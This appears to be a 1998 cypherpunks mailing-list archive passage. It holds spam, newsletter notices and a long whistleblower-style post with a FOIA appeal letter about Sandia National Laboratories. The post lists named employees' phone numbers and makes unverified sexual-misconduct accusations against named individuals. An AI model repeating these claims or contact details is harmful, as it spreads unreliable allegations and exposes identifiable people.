</P><P ALIGN=LEFT>- You can process credit cards right from your computer
- Funds are directly deposited into your checking account 24 - 48 hours
from the time of purchase!!  Now that is FAST

</FONT><FONT COLOR="#000000" SIZE=3>Did you know, Internet shopping is
DOUBLING every 100 days
 
You see, there are really only 2 types of people on the internet, those
who spend money, and those who make money.  WHICH CATEGORY WILL YOU BE IN ????
</P><P ALIGN=CENTER><FONT COLOR="#000080" SIZE=5>Call 1-800-899-2218<FONT
COLOR="#000080" SIZE=3>  </FONT><FONT COLOR="#000000" SIZE=3>
GET YOUR MERCHANT ACCOUNT TODAY!!!
</P><P ALIGN=LEFT>
</B></PRE></HTML>




Thank You
	




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Fri, 14 Aug 1998 08:09:46 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: Dennis Rodman hounded by porn stars/Mom dates alien son http://stuffed.net/98/8/14/
Message-ID: <19980814080000.28639.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL below.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the line,  copy it and then paste it into your browser (then
press Return).

http://stuffed.net/98/8/14/

If you  have an email program that can display web pages you
will find today's front cover should have already been disp-
layed and can be clicked on to take you straight to Stuffed.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Fri, 14 Aug 1998 10:46:23 -0700 (PDT)
To: j orlin grabbe <spohn@etrib.com>
Subject: Sandia Scraps Guided Nuclear Bomb Project
Message-ID: <35D4765F.A24@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Friday 8/14/98 11:21 AM

J Orlin Grabbe http://www.aci.net/kalliste/

The ABQ JOURNAL f 8/14,1998 front page article 

  Sandia Scraps Guided Nuclear
  Bomb Project
  Lab Says Design Work Was Just an Exercise 

  By John Fleck
  Journal Staff Writer

  Sandia National Laboratories has shut down an effort to
  design a guided nuclear bomb that critics say was aimed at
  Third World targets. 
    Sandia pulled the plug because
  of controversy over the fact that the
  lab never received permission for
  the project from senior levels of the
  Clinton administration, said Sandia
  vice president Roger Hagengruber. ...

is interesting from another standpoint.

Article ends with 

  "We have no plans to resurrect the program in fiscal year
  '99 or any year beyond that," said Sandia spokesman Larry
  Perrine. 

Perrine is now married to Renea Dietz of the former Sandia President
Al Narth and then Lockheed Martin VP notoriety.

I attach

  Friday November 15, 1996 14:01

  Ms. GayLa D. Sessoms, Director
  FOAI/Privacy Act Division
  Office of the Executive Secretariat
  The Secretary of Energy
  United States Department of Energy
  Washington, D.C. 20585

Here they are

PERRINE,LARRY G.          (505)845-8511  LGPERRI   (505)844-1392  0167  
PERRINE,RENAE J.          (505)284-2824  RJPERRI   (505)844-6953  0724  
http://www.sandia.gov/cgi-bin/emplloc?ename=perrine 

I received a profane phone call from Larry and Renea Perrine after our
letter to Sessoms hit the Infobhan.

I recorded it, of course.

Narath's third wife is still on the Sandia payroll

NARATH,SHANNA S.          (505)284-2198  SSNARAT   (505)844-6501  0168  
http://www.sandia.gov/cgi-bin/emplloc?ename=narath

Morales knows Perrine fairly well.  

Morales told me he had Perrine USED TO have lunch together.

Orlin, it appears you have correctly measured the capabilities of
SOME OF those running this county. 
http://www.aci.net/kalliste/apocalyp.htm

Perhaps it is time to GET RID OF THEM and settle this UNFORTUNATE
MATTER, of course.

Later
bill

For all of our recollection

Friday 8/14/98 9:06 AM

John Young  http://www.jya.com/index.htm
J Orlin Grabbe  http://www.aci.net/kalliste/

Roger Hagengruber is making news

http://www.abqjournal.com/scitech/1sci8-14.htm

Hagengruber

1  was Jim Durham's office mate when Hagengruber was new at Sandia.
   
   H. B. Durham who served as project leader  
   http://jya.com/da/whpda.htm

2  was C William Childers' boss

3  was James Gosler's boSs

4  was Paul Stokes' boss

  Originator: Paul A. Stokes Date: 4/28/92 http://jya.com/da/whpda.htm

5  encouraged Sandia to do more 'work for others' projects like for 
   the FBI and NSA.

   This includes the 'spiking work' for NSA.   
   
   http://www.aci.net/kalliste/ricono.htm 
   http://www.qainfo.se/~lb/crypto_ag.htm     
   http://caq.com/cryptogate
  
6  told employees that Hagengruber favored shifting Sandia labs from
   DOE control to DOD control.

7  was one of the main people involved in getting me fired and 
   CAUSING THIS MESS.	

   http://www.aci.net/kalliste/speccoll.htm
   http://www.aci.net/kalliste/nukearse.htm
   http://www.aci.net/kalliste/sandcryp.htm
   http://jya.com/whpfiles.htm

8 Hagengruber looks like he may have relative working at Sandia

  HAGENGRUBER,MICHAEL L.    (505)844-0628  MLHAGEN   (505)844-7284 
0121  
  HAGENGRUBER,ROGER L.      (505)844-7310  RLHAGEN   (505)844-1424 
1231   
  http://www.sandia.gov/cgi-bin/emplloc?ename=hagengruber

This matter CLEARLY should be settled before it GETS WORSE!

Later
bill

For all of our recollection

Friday 8/14/98 9:06 AM

John Young  http://www.jya.com/index.htm
J Orlin Grabbe  http://www.aci.net/kalliste/

Roger Hagengruber is making news

http://www.abqjournal.com/scitech/1sci8-14.htm

Hagengruber

1  was Jim Durham's office mate when Hagengruber was new at Sandia.
   
   H. B. Durham who served as project leader  
   http://jya.com/da/whpda.htm

2  was C William Childers' boss

3  was James Gosler's boSs

4  was Paul Stokes' boss

  Originator: Paul A. Stokes Date: 4/28/92 http://jya.com/da/whpda.htm

5  encouraged Sandia to do more 'work for others' projects like for 
   the FBI and NSA.

   This includes the 'spiking work' for NSA.   
   
   http://www.aci.net/kalliste/ricono.htm 
   http://www.qainfo.se/~lb/crypto_ag.htm     
   http://caq.com/cryptogate
  
6  told employees that Hagengruber favored shifting Sandia labs from
   DOE control to DOD control.

7  was one of the main people involved in getting me fired and 
   CAUSING THIS MESS.	

   http://www.aci.net/kalliste/speccoll.htm
   http://www.aci.net/kalliste/nukearse.htm
   http://www.aci.net/kalliste/sandcryp.htm
   http://jya.com/whpfiles.htm

8 Hagengruber looks like he may have relative working at Sandia

  HAGENGRUBER,MICHAEL L.    (505)844-0628  MLHAGEN   (505)844-7284 
0121  
  HAGENGRUBER,ROGER L.      (505)844-7310  RLHAGEN   (505)844-1424 
1231   
  http://www.sandia.gov/cgi-bin/emplloc?ename=hagengruber

This matter CLEARLY should be settled before it GETS WORSE!

Later
bill


Friday November 15, 1996 14:01

Ms. GayLa D. Sessoms, Director
FOAI/Privacy Act Division
Office of the Executive Secretariat
The Secretary of Energy
United States Department of Energy
Washington, D.C. 20585

Dear Ms Sessoms:

Purposes of this letter are;

     1    a    have the Department of Energy deliver lawfully                
	       requested information due us under the Freedom of
               Information Act (FOIA)

               o    legal bills
               o    military double-dipper employees
               o    husband/wife employees
               o    Sandia president Al Narath's use of taxpayer
                    money to fund Narath's sex life at Sandia Labs. 
          b    show that we have exhausted all administrative
               remedies in our attempt to obtain this
               information,

     2    reason with you as to the futility of DOE's attempt to
          resist our lawful inquiries,      

     3    and set a time for our filing our lawful, disruptive,           
	  expensive, damaging FOIA lawsuit if, of course, DOE is           
	  un-swayed by logic.

October 25 you wrote,

     	  Thank you for your October 2, 1996, correspondence addressed      
	to Secretary O'Leary.  In you letter you requested the following 
	information under the provisions of the Freedom of Information Act:

     	1.  	Names, dates of employment, current salaries of all           
		husband/wife combinations who work at Sandia           
		Laboratories as of December 5, 1995; and

     	2.   	Names, dates of employment, current salaries of all           
		husband/wife combinations who work at DOE/ALOO           
		Laboratories as of December 5, 1995.

You go on to state,

     	Pursuant to 10 CFR 1004.8, the adequacy of this search for      
	responsive documents may be appealed to the Director of      
	Hearings and Appeals, HG-1, U.S. Department of Energy, 1000      
	Independence Ave, SW, Washington, DC 20585-0107.  Please include a 
	concise statement of the grounds for the appeal, a description of the 
	relief sought, and attach a copy of this correspondence.  The appeal 
	to the Director must be made within 30 calendar days after your 
	receipt of this letter.  ...

Our October 2 letter stated,

        to appeal a denial of Freedom of Information Act (FOIA)           
	request;

Ms Sessoms, our October 2 letter was an APPEAL directed to Energy 
Secretary.  NOT a FOIA.

And, we can appeal to the Secretary of Energy, not the Director of Hearings 
and Appeals, as you direct.

     	Whenever a FOIA request is denied, the agency must inform      
	the requester of the reasons for the denial and the requester's right 
	to appeal the denial to the head of the agency. 

     	[FOIA GUIDE  Congressional and Administrative News, September 1989]

Ms Sessoms, you appear to want us to appeal an APPEAL.

The above arguments we believe satisfies purpose 1b.  We have exhausted all 
administrative remedies.

You attempt to justify not giving us documents DOE apparently has in its 
possession regarding husband/wife employees with the argument,

     	The Department of Energy (DOE) maintains the Pay/Pers      
	Payroll System which contains employment related data for      
	all DOE employees.  However, the system does not cross      
	reference or otherwise identify employees married to one      
	another.  Therefore, we are unable to provide the information 
	responsible to your request. 

But there are OTHER documents which apparently DO contain reference to 
employees married to one another, we are told.

But this leads to purpose 2: husband/wife employees.  Let's look at reason we 
are requesting these documents,

On Tuesday December 12, 1995 09:44 Payne wrote, 

     	During this time of corporate down-sizing many Americans are      
	losing their jobs, perhaps even their homes as a result.

     	Americans are sensitive, especially in these times, to those      
	abuse the government system for personal financial profit.

     	DOE has refused to release the number and names of retired      
	military double-dippers who work at Sandia and Los Alamos.

     	Like Sandia ethics director and retired general Jack Dickey.

     	Equally offensive to military double-dippers in time of      
	shrinking employment are husband/wife combinations both      
	employed by DOE, Sandia, and Los Alamos.

     	This is especially true if there are some improprieties      
	involved in employment and promotions.

And our October 2, 1996 contains the information,

     	Wednesday September 28 Payne received a letter containing      
	more information about husband/wife.  In summary,

     	1    	Harry and Delores Season

        Harry was a high-level ALOO employee (assistant manager?)  Delores 
	is a GS-14.

	Harry recently retired and went to work for Sandia National 
	Laboratories!

     	2    Tim and Brenda Harmeson

        Brenda is Acting Manager, KAO (Gm-15).  Tim is a staff person at 
	ALOO, likely a GS-13.

     	3    Mike Zamorski and Phyllis Romero

        Mike is Acting Deputy Manager, KAO.  Phyllis recently left DOE 
	employment.

     	4    Ron and Gloria O'Dowd

	Ron is a GM-15 supervisory attorney at ALOO.  O'Dowd reports to 
	DOE/ALOO chief counsel Tyler Przybylek.

	O'Dowd processes FOIA requests.  Like the one Payne is appealing in 
	this letter.

        Gloria also works at DOE/ALOO.

     	5    Rush and Gloria Inlow

     	DOE AL News, DEPARTMENT OF ENERGY ALBUQUERQUE OPERATIONS OFFICE, 
	Aug 23, 1996 reports,

       		Rush Inlow will serve as AL's Deputy Manager

            	Energy Secretary Hazel O'Leary has announced that           
		Rush Inlow will become Deputy Manager of the           
		Albuquerque Operations Office on Aug. 25.  Inlow           
		replaced James W. Culpepper, who retired May 1, 1996           
		and Tyler Przybylek, who has served as acting Deputy           
		Manager in the interim.

     	Letter Payne received on September 28 said that Gloria                
	inlow is retiring September 30, 1996.  Gloria Inlow                
	apparently expressed resentment that she was MADE to                
	retire because it was a conflict of interest for her to                
	work for her husband, Rush Inlow.

        Inlows' estimated yearly income is in excess of $200,000.

        Gloria inlow is apparently going to come back to work a           
	KAO as a contractor employee!
     
     	Secretary O'Leary, it sounds as if your newly appointed 
	Deputy Manager, Rush Inlow, is attempting to subvert      
	nepotism rules.

Purpose 2: military double-dippers.

Payne wrote,

     	Retired military personnel are going to work for Sandia National      
	Laboratories.

     	Not only do these individuals draw generous military      
	retirement pay but they have a large income from Sandia.       
	They are government "double dippers."

     	Retired military who do not work for Sandia observe that      
	almost all those retired military hired by Sandia were      
	administrators in the military.  Not technical military      
	workers.  

     	Code of Ethics & Standards of Conduct of Sandia National      
	Laboratories, a wholly owned subsidiary of Lockheed Martin      
	Corporation states,

          	"The perception of impropriety by Sandians can be as
		damaging to Sandia as would be the commission of the
                perceived offense."

          	"Refrain from offering or providing Government
	         personnel with improper gratuities, ...",

          	"Carefully avoid any situation which will compromise
                Sandia's competitive position or result in a potential
                conflict of interest."

     	page 5.

     	Perhaps giving retired military high-paying jobs while      
	double dipping from the government might be considered an      
	improper gratuity?  

     	And influence-buying with the military might be considered a      
	conflict of interest?

     	If it were the case that Sandia was influence-buying with      
	the military instead of hiring the most capable individuals,      
	then this would be a matter of national security concern.


Los Alamos National Laboratories rejection letter is dated SEP 29 1995.  It 
reads,

     	This letter is the final response to your September 12,      
	1995, Freedom of Information Act (FOIA) request for the      
	following information:

          	"Names and date of employment of all retired military
          	personnel who were hired by Los Alamos National           
		Laboratory between the dated of October 1, 1979, and
           	September 12, 1995."

     	The Office of Public Affairs, Albuquerque Operations Office,      
	contacted the Los Alamos Area Office (LAAO) about your      
	request.  The LLAO states that the records you are seeking      
	are contained in personnel files in the possession and      
	control of the Los Alamos National Laboratory (LANL), and      
	are therefore, not 'agency records' subject to provision of      
	the FOIA.  'Agency records' are defined as records in      
	federal agencies' possession and control at the time of the      
	FOIA request.  However, pursuant to U.S. Department of      
	Energy policy, records in the possession such as LANL, will      
	be made available by DOE when the contract specifically      
	provides that such records are the property of the      
	Government.  The contract between the DOE and LANL, managed      
	by the University of California, clearly defines personnel      
	files such as requested by you as being the property of the      
	contractor.  Accordingly, these records are not subject to      
	release under DOE policy as well.

DOE rejection letter dated August 21 by David L. Geary, signing for Elva 
Barfield, states,

        The SNL, through the Kirtland Area Office, has advised
	they don't have any existing records that identify           
	retired military personnel.  Therefore, there are no           
	responsive records to your request."

     	Not only this this statement false, it smacks of a cover-up      
	of misconduct.

     	Records in Sandia's personnel office list previous employment.

     	On Wednesday August 23, 1995 06:29 I faxed Tom Carpenter of      
	the Government Accountability Project,


        Sandia Lab News, August 18, 1995, page 8 reported with           
	a picture of Dickey,

		"(Sandia's ethics director [Jack Dickey] and retired air	
		force brigadier general, ..."

        Ethics director Dickey is identified by the Lab News as           
	a double-dipper.

        Perhaps the Lab News is trying to blow the whistle again?

        My FOIA denial appears to be a MAJOR COVER UP of           
	impropriety at Sandia.

        I will appeal, of course.

     	Not only is Sandia's hiring retired military personnel      
	probably improper but may be an attempt to undermine the      
	Department of Energy's control of the National Laboratories      
	through "Work for Others" programs.


August 28, 1995 Payne appeals the above FOIA rejections to Hazel R. O'Leary.

The military double-dipper information is withheld despite O'Leary's 
statement,

     	Secretary O'Leary acknowledged that a DOE refusal to provide      
	documents in response to a Freedom of Information Act      
	request that is clearly within the law was "INEXCUSABLE.

     	[DOE review, Vol 1.1, March '94]

Ms Sessoms, we believe that DOE, Sandia, and Los Alamos HAVE RECORDS of 
military double-dipper.

We HAVE a document published by Lockheed Martin showing that the Department 
of Defense (DOD) REQUIRES reporting military double-dippers to DOD!

And we will present this document and other to the court showings that DOE, 
Sandia, and Los Alamos statements about NOT POSSESSING military double-dipper 
records IS A LIE.  If necessary, of course.

Purpose 2: legal bills.

February 1, 1996 Payne writes Charles Przybylek, Chief Counsel, U. S. 
Department of Energy, Albuquerque Operations Office (ALOO),

     	A Freedom of Information Act rejection letter dated January      
	24, 1996 for,

		All invoices submitted to Sandia National Laboratories
                defending against Morales' lawsuit between May 1, 1991 
          	and August 1, 1995. 

     	and

          	invoices submitted to Sandia National Laboratories by
                the law firm of Simons, Cuddy and Friedman between
           	March 1, 1994 and June 1, 1995. 

	appears to be written by a lawyer.

     	But the letter was signed by Freedom of Information Officer,      
	Elva Ann Barfield.

     	The reason Barfield appears not to have written this letter      
	is that DOE employees Elva Barfield and Gwen Schreiner of      
	the Albuquerque Operations office and senior attorney Ann      
	Augustyn of DOE Hearing and appeals forced Sandia to reveal      
	that Friedman collected over $120,000 from about January 1,      
	1993 until March 1, 1994 defending against my lawsuit.  

     	And I are currently attempting to obtain the remainder of      
	Friedman's bills.  The total paid to Friedman to defend      
	against my lawsuit is estimated to be $250,000

     	December 13, 1994 DOE/AL FOIA officer Gwen Schreiner waived      
	fees for the reason, 

          	We have considered your request and have determined           
		that release of the requested records is in the public           
		interest, that disclosure of this information is likely           
		to contribute  significantly to public understanding of the           
		operations or activities of the government, that you or           
		the organization you represent have little or no           
		commercial interest in the material contained in the           
		records, that you or the organization you represent           
		have the qualifications and ability to use and           
		disseminate the information, and that the records are 
		not currently in the public domain.  A waiver of fees 
		is therefore granted.

     	Morales lawsuits cost Sandia/DOE far more than mine.  

     	Morales has been in a court trial at least once.

     	I have never been to court, even for your spending about      
	$250,000! ...

     	Gar Alperowitz in,   
     
          	The Decision to Use the Atomic Bomb and the           
		architecture of an American myth,  Alfred Knopf, 1995

     	writes,


          	As modern disclosures ordered by Energy Secretary Hazel
		O'Leary concerning human radiation experiments suggest
	        such classification provision helped foster a climate
	        in which government officials were virtually exempt
	        from public accountability", 

     	page 614.

     	Now it appears that DOE\ALOO and Sandia Labs attempts to      
	conceal the amount of money both spent on lawyers. ...

But now in the rejection of the request for the remainder of the legal bills 
dated January 24, DOE has changed its mind about further release of legal 
bill information.

     	Although you intended use of the records in more consistent
     	with a determination that you are a "commercial use" requester,
     	we have decided to process your request as an "all other
     	requester" (please refer to my letter to you dated August 1,
     	1995) which entitles you to two hours of search time and the
     	first one hundred page of reproduction free of charge per request.
     	In your request you ask you be contacted  before processing your 
     	requests if there would be any fees for searching for or copying
     	the requested records.  This office has been advised by the Kirtland
     	Area Office and the Sandia National Laboratories/New Mexico of 
     	the estimated charges for the processing of your requests.  The
     	total estimated charges for both requests (95-139-B and 95-175-C)
     	are between $100 and $500.
	
     	Before we can continue to process your request, we must have your
     	agreement to pay the fees associated with the search and production
     	of the documents.  If you wish to modify your requests to reduce the 
     	amount of anticipated fees, please advise the office in writing
     	by February 7, 1996.  If you do not hear from you by February 7,
     	1996, we will consider your request withdrawn and will close      
	the files.

Wednesday February 28, 1996 we warn Przybylek of an impending lawsuit if the 
legal bill documents are not forthcoming.

     	Dear lawyer Przybylek:

     	You wrote me on FEB 21.  

     	Most of the contents of your letter were false, ambiguous,      
	or misrepresented the facts.

     	Purpose of this letter is to correct your letter, clarify      
	ambiguities and misrepresentations, and convince you and      
	others that we WILL sue ... 

     	You wrote,

          	Reference is made to your February 1, 1996 letter to me
                concerning your Freedom of Information Act (FOIA)
           	requests seeking law firm invoice submitted to Sandia
           	National Laboratories.  Sandia National Laboratories is
           	managed and operated for the Department of Energy by
           	Lockheed/Martin, so I assume that you are seeking invoices
           	submitted to that organization.

          	Specifically, you stated that you are seeking invoices
                submitted to Lockheed/Martin in defense of the Morales
                lawsuit (Garcia/Morales) and all invoices submitted to 
                Lockheed/Martin by the law firm of Simons, Cuddy and
                Friedman between March 12, 1994 and June 1, 1995.

     	Contents of these two paragraphs are FALSE.

     	I wrote Elva Barfield on Friday July 28, 1995,

     	1    	All invoices submitted to Sandia National Laboratories
           	by all law firms defending Sandia against Morales'
           	lawsuit between May 1, 1991 and August 1, 1995. 

     	Your FALSIFICATIONS include:

     	1    	The starting date IS May 1, 1991, NOT March 12, 1994.

     	2    	I specified "all law firms" NOT JUST Simons, Cuddy and
          	Friedman.   

     	3    	I DID NOT specify just Lockheed/Martin.

     	You wrote next,

          	Although such invoiced have been held to be exempt from
                public release under the provisions of the FOIA because
           	they constitute attorney work-product under exemption 5, 
		(The Rio Grande Sun, Case KFA-0090), the name of the
           	law firm submitting such invoice and the total amount
           	of the invoice has been released as a matter of policy
	        of the DOE General Counsel.  Therefore, I am treating
           	your letter to me as a request for this information
           	under that policy.

     	Your above paragraph is nonsense.

          	Exemption 5 - Internal Government Communications

          	The FOIA's fifth exemption applies to internal           
		government documents.  An example is a letter from one
           	government department to another about a joint decision
           	that has not yet been made.  Another example is a
           	memorandum from an agency employee to his supervisor
           	describing options for conducting the agency's business.

          	The purpose of the fifth exemption is to safeguard the
                deliberative policy making process of government.  The
                exemption encourages frank discussion of policy matter
                between agency officials by allowing supporting
           	documents to be withheld from public disclosure.  The
           	exemption also protects against premature disclosure of
           	policies before final adoption.

          	[FIRST REPORT By The COMMITTEE ON GOVERNMENT           
		OPERATIONS, 1993]

     	So, lawyer Przybylek, your conclusion about exempting legal      
	bills from the FOIA using exemption 5 is incorrect.

     	You cannot use exemption 5 to attempt to cover up taxpayer      
	money misspent on legal bills. ...

     	You wrote,

          	Although our figures are not broken down by the dates
           	you have referenced, I am providing the following
           	information. The total amount of invoices submitted in
           	the Garcia/Morales litigation as of December 31, 1995,
           	was $567,137.00.  

     	Morales feels that this amount is too low.

     	Morales points out that you did not include bills from the
     	law firm of, 

     	1    	Rodey, Richardson, Sloan, Akin, and Robb 
          	between the dates of January 1, 1991 and January 29,
           	1993.

     	Nor did you include bills from the law firm of,

     	2    Butt, Thornton, Baehr,

     	and the law firm of,

     	3    Fenwick and West in California,

     	so we guess that the amount is near DOUBLE the approximate
     	$570,000 you write.  More than $1,000,00!  

     	These records are obtained from the docket sheet.

     	You wrote, 

     	The total amount of invoices submitted by the Simons, Cuddy, 
     	and Friedman law firm in the case of Payne v. Sandia Corp.,
      	et al was $108,341.00 as of December 31, 1995.  ... 

     	So the total is more than $228,000!

     	Legal bills sum of $228,000, of course, is absurd considering we 
	have NEVER been to trial! ...

     	Morales and I have cost DOE more than $1,000,000 in legal bills.  
	Perhaps double this number!

Ms Sessoms, we FOIAed Przybylek again for legal bill information.

We did not receive any response to our FOIA.

Ms. Sessoms, we feel that we have exhausted all of the administrative 
remedies available to us to obtain legal bill information.  

Purpose 2: Sandia president Al Narath's use of taxpayer money to fund 
Narath's sex life at Sandia Labs.

October 30, 1996 I appealed to Hazel R. O'Leary,

     	Dear Secretary O'Leary:

     	Purposes of this letter is to appeal a denial of Freedom of      
	Information Act (FOIA) request.

     	DOE FOIA request denial appeals, according to law, can be      
	made to you.

     	October 10, 1996 Michael Conley wrote,

		Dear Dr. Payne:

		This is in response to the above-referenced requests in which
		you sought (1) " Copies of reports of misconduct by Al Narath
		made by DOE's IG or other office between January 11, 1993 and
		November 27, 1995" and (2)"Any reports containing the name of 
		William Payne, Bill Payne, etc. between January 11, 1993 and 
		November November 27, 1995."

		With respect to you request (1) cited above, the Office of
		Inspector General neither confirms nor denies the existence 
		of records responsive to you request.  Lack an individual's
		consent, and official acknowledgment of an investigation, or 
		an overriding public interest, even to acknowledge the 
		existence of such pertaining to an individual could be 
		reasonably be expected to constitute and unwarranted invasion 
		of personal privacy.  Refer to 5 U.S.C. 552(b)(7)(C).

		With respect to you request (2) cited above, we would note 
		that our records do contain responses by the Office of 
		Inspector General to you regarding your previous Freedom of 
		Information Act requests, numbers 93120302 and 951221001.  In 
		addition, the Office of Investigations, Office of Inspector 
		General, will be responding to your request (2) as part of its 
		response to your FOIA request number 95112002.

		This decision may be appealed with 30 calendar days of         
		your receipt of this determination pursuant to 10 C.F.R.
	        1004.8.  Appeals should be addressed to the:

			Director
			Office of Hearing and Appeals
			Department of Energy
			1000 Independence Ave, SW
			Washington, D.C. 20595

		Thereafter, judicial review will be available to you in the 
		federal district court either (1) in the district where you 
		reside, (2) where you have your principal place of business, 
		(3) where the Department's records are situated or (4) in the 
		District of Columbia.

				Sincerely,

				Michael W. Conley
				Deputy Inspector General for Inspections
				Office of Inspector General.

     	I appeal this denial.

     	Sandia president Al Narath was apprehended in an act of      
	sexual penetration with his administrative assistant, Renea
      	Dietz in about 1992.

     	Narath lost his security clearances, briefly, over this      
	incident.

     	Narath's second wife, Barbara, also divorced Narath, in      
	part, over this incident.

     	Dietz was promoted to an administrative position at Sandia.

     	Shanna Lindeman divorced her husband.

     	Lindeman was appointed to a division supervisor position at      
	Sandia.  Lindeman was the only employee in her division.

     	Narath and Lindeman later married in Carmel, California.

     	Lindeman has apparently not completed college but is      
	reported to make about $120,000 per year at Sandia.

     	Narath was reported changing the locks on his Sandia office.       
	But this did not prevent Sandia security from apparently      
	apprehending Narath with five nude women in his office.

     	Mr. Ray Armenta, Equal Employment Opportunities Commission      
	employee, confirmed this above incident.

     	Apparently Narath was apprehended on the final weekend of      
	his employment at Sandia in an act of sexual penetration      
	with another employee in his Sandia office.

     	Narath moved on to his new job as a Vice President of      
	Lockheed Martin in charge of DOE Energy and Environment      
	projects, Lockheed Martin, TODAY, August 1996 reports.

     	Conley's statement,
          
          "even to acknowledge the existence of such pertaining
           to an individual could be reasonably be expected to
           constitute and unwarranted invasion of personal privacy"

     	is clearly in error.

     	Narath's sex life at Sandia not only public but financed by
      	taxpayer money. ...

Ms Sessoms, IG official Conley is apparently unaware of the Vaughn Index or 
is attempting to deceive us.

DOE MUST acknowledge existence of documents even if it wishes to withhold 
those documents for reason of FOIA exemption.

                    Vaughn Index

     	A distinguishing feature of FOIA litigation is that the      
	defendant agency bears the burden of sustaining its action      
	of withholding records.  

So, Ms. Sessoms, Conley is disobeying the law by failure to acknowledge 
existence of investigations reports of Narath.

Purpose 4: Time limits for lawsuit.

Ms Sessoms, O'Leary STATED in her celebrated whistleblower speech,

     	I commit to promoting openness and I think one way I do      
	this is being open myself.  ...

     	There is one final piece, ... measure results.  Don't      
	ever measure what anybody says, measure what is done ... 
     	And when we haven't done it well or completely or      
	correctly we can come back and adjust, I expect you be      
	to on me.

We are.

Morales and Payne have always felt the settlement of disputes is preferable 
to litigation.  

     	It's impossible to know how much the DOE spends combating      
	whistleblowers at its 15 weapons plants across the country,      
	but it's safe to say that Hanford's tab alone is upwards of      
	several million dollars annually.  One significant drain on      
	the taxpayer's pocketbook is the DOE's practice of paying      
	100 percent of the legal expenses its contractors incur in      
	fighting whistleblower lawsuits, regardless of the merits of      
	the case.  This encourages contractors to hire the most      
	expensive lawyers and to continue litigation even when      
	settlement would be cheaper."   

     	Michael O'Rourke, Cascadia Times, July 1995, page 10.

We do not wish for DOE to further waste the taxpayers money.

BUT if we do not have settlement or the lawfully requested documents, 
THEN we will file our expensive, disruptive, public, damaging lawsuit on 
December 20.

If you have evidence that we have NOT exhausted all administrative remedies 
within the DOE, then we ask you to submit this to us by Friday December 1.

Otherwise, we take no response as evidence that all administrative remedies 
have been exhausted.

Sincerely,



William H. Payne                   Arthur R. Morales                  
13015 Calle de Sandias NE          1024 LosArboles NW                
Albuquerque, NM 87111              Albuquerque, NM 87107



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Fri, 14 Aug 1998 10:44:18 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - August 14, 1998
Message-ID: <199808141735.MAA24431@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3995.1071713794.multipart/mixed"

--Boundary..3995.1071713794.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit




==========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

If you cannot open the icon/attachment, please visit
http://www.wow-com.com/professional/      for the wireless 
daily news.

Don't miss the major conference on implementing 
Phase 2 of the E-911 requirement--August 26-27 
in San Francisco.  For more information, click 
http://www.wow-com.com/pdf/locntech.pdf 
===========================================
 




--Boundary..3995.1071713794.multipart/mixed
Content-Type: application/octet-stream; name="bin00001.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00001.bin"
Content-Description: "_CTIA_Daily_News_19980814.htm"

PEhUTUw+DQo8SEVBRD4NCiAgIDxNRVRBIEhUVFAtRVFVSVY9IkNvbnRlbnQt
VHlwZSIgQ09OVEVOVD0idGV4dC9odG1sOyBjaGFyc2V0PWlzby04ODU5LTEi
Pg0KICAgPE1FVEEgTkFNRT0iQXV0aG9yIiBDT05URU5UPSJDVElBIEVkaXRv
cmlhbCBTdGFmZiI+DQogICA8TUVUQSBOQU1FPSJHRU5FUkFUT1IiIENPTlRF
TlQ9Ik1vemlsbGEvNC4wMiBbZW5dIChXaW45NTsgSSkgW05ldHNjYXBlXSI+
DQogICA8VElUTEU+X0NUSUEgRGFpbHkgTmV3cyBGcm9tIFdPVy1DT01fPC9U
SVRMRT4NCjwvSEVBRD4NCjxCT0RZPg0KJm5ic3A7PGNlbnRlcj4NCjxUQUJM
RSBCT1JERVI9MCBDT0xTPTIgV0lEVEg9IjYwMCIgPg0KPFRSPg0KPFREPjxB
IEhSRUY9Imh0dHA6Ly93d3cud293LWNvbS5jb20iPjxJTUcgU1JDPSJodHRw
Oi8vd3d3Lndvdy1jb20uY29tL2ltYWdlcy9ob21laGVkX3Rlc3QuZ2lmIiBB
TFQ9IldPVy1DT00uQ09NIiBOT1NBVkUgQk9SREVSPTAgSEVJR0hUPTg5IA1X
SURUSD0yNzU+PC9BPjwvVEQ+DQoNCjxURD4NCjxDRU5URVI+PEEgSFJFRj0i
aHR0cDovL3d3dy53aXJlbGVzc2l0LmNvbSI+PElNRyBTUkM9Imh0dHA6Ly93
d3cud293LWNvbS5jb20vaW1hZ2VzL2FydGRyb3AvMHdpcmVsZXNzaXQuZ2lm
IiBBTFQ9IlRvZGF5J3MgTmV3cyBTcG9uc29yZWQgYnkgV0lSRUxFU1MgSS5U
LiA5OCIgTk9TQVZFIEJPUkRFUj0wIEhFSUdIVD02MCBXSURUSD0yMzQ+PC9B
PjwvQ0VOVEVSPg0KPC9URD4NCjwvVFI+DQo8L1RBQkxFPg0KJm5ic3A7DQo8
VEFCTEUgQk9SREVSPTAgV0lEVEg9IjYwMCIgPg0KPFRSIEJHQ09MT1I9IiMw
MDAwOTkiPg0KPFREPjwvVEQ+DQoNCjxURD48Qj48Rk9OVCBGQUNFPSJBcmlh
bCxIZWx2ZXRpY2EiPjxGT05UIENPTE9SPSIjQ0NDQ0NDIj48Rk9OVCBTSVpF
PSsxPkNUSUENCkRhaWx5IE5ld3MgZnJvbSBXT1ctQ09NIC0gQXVndXN0IDE0
